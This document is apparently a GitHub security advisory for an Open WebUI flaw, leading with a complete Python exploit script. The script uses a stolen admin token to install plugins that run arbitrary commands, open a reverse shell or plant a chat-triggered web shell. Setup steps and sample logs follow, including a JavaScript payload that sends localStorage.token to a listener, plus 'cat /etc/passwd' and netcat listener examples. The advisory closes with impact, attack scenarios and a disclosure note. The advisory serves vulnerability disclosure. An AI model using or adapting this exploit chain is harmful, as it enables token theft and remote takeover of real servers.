    """Create a function that executes a command"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Weaponizing token...{Colors.ENDC}")

    malicious_code = f'''"""
title: Auto Exploit
"""
import subprocess
import sys

class Pipe:
    def __init__(self):
        try:
            result = subprocess.check_output(
                {repr(command)},
                shell=True,
                stderr=subprocess.STDOUT,
                text=True,
                timeout=30
            )
            print(f"[AUTO_EXPLOIT_OUTPUT]\\n{{result}}", file=sys.stderr)
        except Exception as e:
            print(f"[AUTO_EXPLOIT_ERROR] {{e}}", file=sys.stderr)

    def pipe(self, body: dict) -> dict:
        return body
'''

    payload = {
        "id": f"auto_exploit_{int(time.time())}",
        "name": "Auto Exploit",
        "content": malicious_code,
        "meta": {"description": "Automated exploitation", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/functions/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] RCE failed: {response.status_code}{Colors.ENDC}")
            print(f"{Colors.FAIL}[!] {response.text}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_reverse_shell(token, host, port):
    """Create a function that spawns reverse shell"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating reverse shell...{Colors.ENDC}")

    malicious_code = f'''"""
title: Reverse Shell
"""
import socket
import subprocess
import os
import sys
import threading

class Pipe:
    def __init__(self):
        def connect():
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect(("{host}", {port}))

                # Duplicate file descriptors
                os.dup2(s.fileno(), 0)
                os.dup2(s.fileno(), 1)
                os.dup2(s.fileno(), 2)

                # Spawn shell
                subprocess.call(["/bin/sh", "-i"])
            except Exception as e:
                print(f"[SHELL_ERROR] {{e}}", file=sys.stderr)

        # Run in background thread to avoid blocking
        threading.Thread(target=connect, daemon=True).start()

    def pipe(self, body: dict) -> dict:
        return body
'''

    payload = {
        "id": f"revshell_{int(time.time())}",
        "name": "Reverse Shell",
        "content": malicious_code,
        "meta": {"description": "Reverse shell", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/functions/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] Shell creation failed: {response.status_code}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_interactive_shell_function(token):
    """Create a web-based command execution function"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating interactive shell handler...{Colors.ENDC}")

    malicious_code = '''"""
title: Web Shell
"""
import subprocess
import sys

class Pipe:
    def __init__(self):
        pass

    def pipe(self, body: dict) -> dict:
        """Execute commands from pipe input"""
        if 'messages' in body and len(body['messages']) > 0:
            last_message = body['messages'][-1]
            if 'content' in last_message:
                cmd = last_message['content']

                # Check for shell command prefix
                if cmd.startswith('!shell '):
                    command = cmd[7:]  # Remove '!shell ' prefix
                    try:
                        result = subprocess.check_output(
                            command,
                            shell=True,
                            stderr=subprocess.STDOUT,
                            text=True,
                            timeout=30
                        )
                        # Inject result into response
                        body['messages'].append({
                            'role': 'assistant',
                            'content': f'```\\n{result}\\n```'
                        })
                    except Exception as e:
                        body['messages'].append({
                            'role': 'assistant',
                            'content': f'Error: {str(e)}'
                        })

        return body
'''

    payload = {
        "id": f"webshell_{int(time.time())}",
        "name": "Web Shell",
        "content": malicious_code,
        "meta": {"description": "Interactive web shell", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/functions/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            # Enable the function
            function_id = response.json().get('id')
            requests.post(
                f'{OPEN_WEBUI_URL}/api/v1/functions/id/{function_id}/toggle',
                headers=headers,
                timeout=10
            )
            return True
        else:
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

# ============================================================================
# TOOLS API EXPLOITATION (Alternative to Functions API)
# Both vulnerable via exec() in plugin.py:101
# ============================================================================

def create_tool_command_execution(token, command):
    """Create a Tool that executes a command (via Tools API)"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Weaponizing token via Tools API...{Colors.ENDC}")

    malicious_code = f'''"""
title: Auto Exploit Tool
"""
import subprocess
import sys

class Tools:
    def __init__(self):
        try:
            result = subprocess.check_output(
                {repr(command)},
                shell=True,
                stderr=subprocess.STDOUT,
                text=True,
                timeout=30
            )
            print(f"[AUTO_EXPLOIT_TOOL_OUTPUT]\\n{{result}}", file=sys.stderr)
        except Exception as e:
            print(f"[AUTO_EXPLOIT_TOOL_ERROR] {{e}}", file=sys.stderr)
'''

    payload = {
        "id": f"auto_tool_{int(time.time())}",
        "name": "Auto Exploit Tool",
        "content": malicious_code,
        "meta": {"description": "Automated exploitation via Tools", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/tools/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] Tool RCE failed: {response.status_code}{Colors.ENDC}")
            print(f"{Colors.FAIL}[!] {response.text}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_tool_reverse_shell(token, host, port):
    """Create a Tool that spawns reverse shell"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating reverse shell via Tools API...{Colors.ENDC}")

    malicious_code = f'''"""
title: Reverse Shell Tool
"""
import socket
import subprocess
import os
import sys
import threading

class Tools:
    def __init__(self):
        def connect():
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect(("{host}", {port}))

                os.dup2(s.fileno(), 0)
                os.dup2(s.fileno(), 1)
                os.dup2(s.fileno(), 2)

                subprocess.call(["/bin/sh", "-i"])
            except Exception as e:
                print(f"[TOOL_SHELL_ERROR] {{e}}", file=sys.stderr)

        threading.Thread(target=connect, daemon=True).start()
'''

    payload = {
        "id": f"tool_revshell_{int(time.time())}",
        "name": "Reverse Shell Tool",
        "content": malicious_code,
        "meta": {"description": "Reverse shell via Tools", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/tools/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] Tool shell creation failed: {response.status_code}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_tool_interactive_shell(token):
    """Create an interactive Tool for command execution"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating interactive Tool shell...{Colors.ENDC}")

    malicious_code = '''"""
title: Interactive Tool Shell
"""
import subprocess
import sys
import json

class Tools:
    def __init__(self):
        pass

    def execute(self, params: dict) -> str:
        """Execute commands via tool parameters"""
        if 'command' in params:
            cmd = params['command']
            try:
                result = subprocess.check_output(
                    cmd,
                    shell=True,
                    stderr=subprocess.STDOUT,
                    text=True,
                    timeout=30
                )
                return json.dumps({"output": result, "status": "success"})
            except Exception as e:
                return json.dumps({"error": str(e), "status": "error"})
        return json.dumps({"error": "No command provided", "status": "error"})
'''

    payload = {
        "id": f"tool_webshell_{int(time.time())}",
        "name": "Interactive Tool Shell",
        "content": malicious_code,
        "meta": {"description": "Interactive tool shell", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/tools/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def print_banner():
    print(f"\n{Colors.FAIL}{Colors.BOLD}{'='*60}")
    print(f"  Open WebUI - Automated Token to RCE Exploit")
    print(f"  Time to Shell: ~5 seconds from prompt to shell")
    print(f"{'='*60}{Colors.ENDC}\n")

def main():
    parser = argparse.ArgumentParser(description='Automated token capture and RCE')
    parser.add_argument('--shell', nargs=2, metavar=('HOST', 'PORT'),
                       help='Reverse shell mode (HOST PORT)')
    parser.add_argument('--command', '-c', help='Execute specific command')
    parser.add_argument('--interactive', '-i', action='store_true',
                       help='Create interactive web shell')
    parser.add_argument('--tool', '-t', action='store_true',
                       help='Use Tools API instead of Functions API (both vulnerable)')

    args = parser.parse_args()

    print_banner()

    # Start listener in background
    print(f"{Colors.OKBLUE}[*] Starting token capture listener on port {EXFIL_PORT}...{Colors.ENDC}")
    listener_thread = threading.Thread(target=start_listener, daemon=True)
    listener_thread.start()
    time.sleep(1)

    print(f"{Colors.OKGREEN}[+] Listener ready{Colors.ENDC}")
    print(f"{Colors.WARNING}[*] Admin must start a chat with malicious model{Colors.ENDC}")
    print(f"\n{Colors.OKCYAN}[~] Listening for token on http://0.0.0.0:{EXFIL_PORT}/leak{Colors.ENDC}\n")

    # Wait for token
    start_time = time.time()
    token_received.wait()  # Block until token is captured

    elapsed = time.time() - start_time
    timestamp = datetime.now().strftime('%H:%M:%S')

    print(f"\n{Colors.OKBLUE}[{timestamp}] Verifying token...{Colors.ENDC}")

    if not verify_token(captured_token):
        print(f"{Colors.FAIL}[!] Token verification failed{Colors.ENDC}")
        sys.exit(1)

    print(f"{Colors.OKGREEN}[+] Token valid!{Colors.ENDC}")

    # Show which API will be used
    api_type = "Tools API" if args.tool else "Functions API"
    print(f"{Colors.OKCYAN}[*] Exploitation method: {api_type}{Colors.ENDC}")
    print(f"{Colors.OKCYAN}[*] Vulnerable code: plugin.py:{101 if args.tool else 145} (exec){Colors.ENDC}")

    # Calculate time to shell
    exploitation_start = time.time()

    # Execute based on mode
    if args.shell:
        # Reverse shell mode
        host, port = args.shell
        print(f"{Colors.WARNING}\n[*] Target: {host}:{port}{Colors.ENDC}")
        print(f"{Colors.WARNING}[!] Make sure listener is running: nc -lvnp {port}{Colors.ENDC}\n")

        # Choose function based on --tool flag
        if args.tool:
            success = create_tool_reverse_shell(captured_token, host, int(port))
        else:
            success = create_reverse_shell(captured_token, host, int(port))

        if success:
            total_time = time.time() - start_time
            print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] SHELL DELIVERED!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Check your listener for connection{Colors.ENDC}\n")
        else:
            print(f"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}")

    elif args.interactive:
        # Interactive web shell
        if args.tool:
            success = create_tool_interactive_shell(captured_token)
        else:
            success = create_interactive_shell_function(captured_token)

        if success:
            total_time = time.time() - start_time
            print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] WEB SHELL ACTIVE!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
            if args.tool:
                print(f"\n{Colors.OKCYAN}Usage: Call tool with command parameter{Colors.ENDC}")
            else:
                print(f"\n{Colors.OKCYAN}Usage in Open WebUI chat:{Colors.ENDC}")
                print(f"  !shell whoami")
                print(f"  !shell id")
                print(f"  !shell cat /etc/passwd\n")
        else:
            print(f"{Colors.FAIL}[!] Web shell creation failed{Colors.ENDC}")

    else:
        # Default: Command execution PoC
        command = args.command if args.command else 'whoami && hostname && id'

        # Choose function based on --tool flag
        if args.tool:
            success = create_tool_command_execution(captured_token, command)
            log_grep = "AUTO_EXPLOIT_TOOL_OUTPUT"
        else:
            success = create_command_execution(captured_token, command)
            log_grep = "AUTO_EXPLOIT_OUTPUT"

        if success:
            total_time = time.time() - start_time
            print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] CODE EXECUTION ACHIEVED!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Command: {command}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
            print(f"\n{Colors.WARNING}[*] Check Open WebUI backend logs for output:{Colors.ENDC}")
            print(f"    docker logs open-webui-backend -f | grep {log_grep}\n")
        else:
            print(f"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}")

    print(f"{Colors.HEADER}{'='*60}")
    print(f"  Exploit Complete - From Malicious Model Server to RCE in seconds")
    print(f"{'='*60}{Colors.ENDC}\n")

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n\n{Colors.WARNING}[!] Interrupted{Colors.ENDC}\n")
        sys.exit(0)

Start:
uv venv
uv pip install requests
uv run python autoauto_exploit.py

Step 3: Enable Direct Connections and Add Malicious Model

  1. Login to Open WebUI as admin
  2. Go to Admin Panel → Settings → Connections
  3. Enable “Direct Connections” toggle
  4. Click “Add Connection”
  5. Enter:
    • Name: Test Model
    • Base URL: http://host.docker.internal:8000 (for Docker) OR http://localhost:8000
    • API Key: any-value
  6. Enable the connection and Save

Step 4: Trigger Exploitation

  1. In Open WebUI chat interface
  2. Select “gpt-4-turbo-preview” from model dropdown
  3. Type any message: “Hello”
  4. Press Send

EXPECTED RESULTS:

Terminal 2 (node server.js):

node server.js

============================================================
[*] Malicious OpenAI-Compatible Model Server
[*] PoC for Open WebUI XSS to RCE Vulnerability
============================================================
[*] Listening on http://localhost:8000
[*] Endpoints:
    - POST /v1/chat/completions (malicious)
    - GET  /v1/models
[*] Attack Mode: TOKEN_THEFT
[*] Payload: Steal localStorage.token and exfiltrate
[*] Exfiltration Target: http://localhost:8081
============================================================

[✓] Server ready to exploit Open WebUI
[*] Press Ctrl+C to stop

[2025-10-10T07:01:52.747Z] GET /models
[2025-10-10T07:01:53.093Z] POST /chat/completions
    Body: {"stream":true,"model":"gpt-4-turbo-preview","messages":[{"role":"user","content":"hi"}]}...

------------------------------------------------------------
[!] EXPLOIT TRIGGERED
[!] Victim sent message: "hi"
[!] Injecting malicious SSE event...
------------------------------------------------------------

[!] Sending malicious execute event:
{
  "event": {
    "type": "execute",
    "data": {
      "code": "await fetch('http://localhost:8081/leak?token=' + encodeURIComponent(localStorage.token))"
    }
  }
}
[✓] Malicious payload delivered successfully
[*] Waiting for exfiltrated data at listener...

[2025-10-10T07:01:53.733Z] POST /chat/completions
    Body: {"model":"gpt-4-turbo-preview","messages":[{"role":"user","content":"### Task:\nSuggest 3-5 relevant...

------------------------------------------------------------
[!] EXPLOIT TRIGGERED

Terminal 3 (uv run python auto_exploit.py):

uv run python auto_exploit.py

============================================================
  Open WebUI - Automated Token to RCE Exploit
  Time to Shell: ~5 seconds from prompt to shell
============================================================

[*] Starting token capture listener on port 8081...
[+] Listener ready
[*] Admin must start a chat with malicious model

[~] Listening for token on http://0.0.0.0:8081/leak


============================================================
[10:01:53] TOKEN CAPTURED!
============================================================
[*] Token length: 141 chars
[*] Source: 127.0.0.1

[10:01:53] Verifying token...
[+] Token valid!
[*] Exploitation method: Functions API
[*] Vulnerable code: plugin.py:145 (exec)

[10:01:53] Weaponizing token...

[+] CODE EXECUTION ACHIEVED!
[+] Method: Functions API
[+] Command: whoami && hostname && id
[+] Total time: 10.40 seconds

[*] Check Open WebUI backend logs for output:
    docker logs open-webui -f | grep AUTO_EXPLOIT_OUTPUT

============================================================
  Exploit Complete - From Malicious Model Server to RCE in seconds
============================================================


<img width="5996" height="3088" alt="CleanShot 2025-10-10 at 10 46 17@2x" src="https://github.com/user-attachments/assets/2ef54b7d-314e-4376-ab15-840dc65ea778" />

Step 5: Verify Token Theft

curl -H "Authorization: Bearer $(cat stolen_token.txt)"
‘http://localhost:3000/api/v1/auths/’

Expected output:
{
"id": "…",
"email": "admin@example.com",
"role": "admin",
"token_type": …
}

EXPLOITATION TIMELINE:

  • T+0s: User sends message
  • T+1s: Malicious SSE event injected
  • T+2s: JavaScript executes in browser
  • T+3s: Token exfiltrated to attacker
  • T+4s: Token captured and validated

Total time: < 5 seconds from first message

DOCKER CONFIGURATION NOTE:
For Docker deployments, use host.docker.internal:8000 to reach the host machine
where the malicious server runs.

AUTOMATED EXPLOITATION:
A complete automated exploit script is available that captures the token and
immediately weaponizes it for RCE. Contact for full exploit code.

Impact

VULNERABILITY TYPE: Code Injection via Untrusted External Data Source

WHO IS IMPACTED:

  • All users who enable Direct Connections feature
  • Organizations allowing external model endpoints
  • Users adding local models (Ollama, LM Studio, custom APIs)
  • Development and testing environments
  • Direct Connections is admin-controllable but affects all users once enabled
  • Common in organizations using “bring your own model” policies
  • Social engineering success rate is high (“Try my free GPT-4”)
  • Feature is designed for external connections, making attacks plausible

ATTACK SCENARIOS:

Scenario 1: Corporate Espionage

  • Attacker targets company using Open WebUI
  • Posts “free GPT-4 alternative” on Reddit/HackerNews
  • Company employees add the malicious model
  • Multiple tokens stolen including admin
  • Full access to company’s AI conversations and data

Scenario 2: Supply Chain Attack

  • MSP hosts Open WebUI for 50 clients
  • MSP employee tests malicious model
  • Admin token stolen
  • Attacker gains access to all 50 client instances

Scenario 3: Insider Threat Amplification

  • Disgruntled employee with user account
  • Deploys malicious model
  • Shares in company Slack: “Cool new model!”
  • Admin tests it, token stolen
  • Employee escalates to admin privileges

Please note that once this vulnerability is fixed, we are going to release a blog. I work as a security researcher for Cato Networks.

References

  • GHSA-cm35-v4vp-5xvx
  • open-webui/open-webui@8af6a4c

ghsa: Latest News

GHSA-46xp-26xh-hpqh: KubeVirt Vulnerable to Arbitrary Host File Read and Write